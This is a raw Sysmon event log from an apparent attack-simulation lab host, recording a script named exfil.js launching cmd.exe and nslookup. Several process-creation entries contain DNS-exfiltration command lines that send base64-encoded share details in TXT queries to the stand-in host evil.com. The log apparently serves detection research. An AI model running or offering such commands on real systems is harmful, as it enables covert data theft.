14:16:05.847{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.847{2E1864BB-17A5-629A-B23D-000000005F02}46204156C:\Windows\system32\cmd.exe{2E1864BB-17A5-629A-B43D-000000005F02}5108C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.858{2E1864BB-17A5-629A-B43D-000000005F02}5108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A5-629A-B23D-000000005F02}4620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpglh.tmp 2>&1 10341000x8000000000000000194208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.816{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-B33D-000000005F02}6960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.816{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-B33D-000000005F02}6960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.816{2E1864BB-17A5-629A-B33D-000000005F02}69603732C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-B23D-000000005F02}4620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.800{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-B33D-000000005F02}6960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.794{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-B23D-000000005F02}4620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.794{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.777{2E1864BB-17A1-629A-783D-000000005F02}55527512C:\Windows\System32\WScript.exe{2E1864BB-17A5-629A-B23D-000000005F02}4620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.794{2E1864BB-17A5-629A-B23D-000000005F02}4620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpglh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.777{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltze.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.746{2E1864BB-17A5-629A-B03D-000000005F02}41487804C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-B13D-000000005F02}7356C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.746{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.746{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-B13D-000000005F02}7356C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.746{2E1864BB-17A5-629A-AF3D-000000005F02}42042872C:\Windows\system32\cmd.exe{2E1864BB-17A5-629A-B13D-000000005F02}7356C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.747{2E1864BB-17A5-629A-B13D-000000005F02}7356C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A5-629A-AF3D-000000005F02}4204C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltze.tmp 2>&1 10341000x8000000000000000194188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.646{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-B03D-000000005F02}4148C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.646{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-B03D-000000005F02}4148C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.646{2E1864BB-17A5-629A-B03D-000000005F02}41487804C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-AF3D-000000005F02}4204C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.598{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-B03D-000000005F02}4148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.595{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.595{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.594{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-AF3D-000000005F02}4204C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 